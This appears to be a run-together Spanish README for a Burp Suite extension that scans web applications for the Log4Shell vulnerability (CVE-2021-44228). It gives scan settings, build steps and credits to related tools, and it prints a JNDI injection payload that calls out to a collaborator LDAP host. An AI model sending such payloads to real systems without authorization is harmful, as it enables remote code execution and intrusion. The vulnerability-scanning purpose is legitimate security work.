
Extensión de Burp para escanear la vulnerabilidad Log4Shell (CVE-2021-44228) pre y post autenticación.
No soy responsable de tus acciones, de que Burp Suite se congele, de que el objetivo sea hackeado, de una guerra termonuclear, o de la crisis económica actual causada por seguir estas instrucciones. TÚ eliges usar esta herramienta, y si me señalas por haber estropeado algo, me reiré de ti.

Scan Configuration > Select from libraryAudit checks - extensions only y haz clic en OK.Agradecimientos especiales a Silent Signal, las instrucciones y configuraciones de escaneo están inspiradas en su extensión.
[collaborator-server] como marcador de posición,[collaborator-server será reemplazado por la URL de tu servidor colaborador."${jndi:ldap://[collaborator-server]/a}https://github.com/0xDexter0us/Log4J-Scanner/releases/
./gradlew build fatJarbuild/libs/Log4J-Scanner-x.x.x.jarhttps://github.com/f0ng/log4j2burpscannerhttps://github.com/albinowax/ActiveScanPlusPlus y https://github.com/silentsignal/burp-log4shell25 de diciembre de 2021 - v0.2.0
13 de diciembre de 2021 - v0.1.0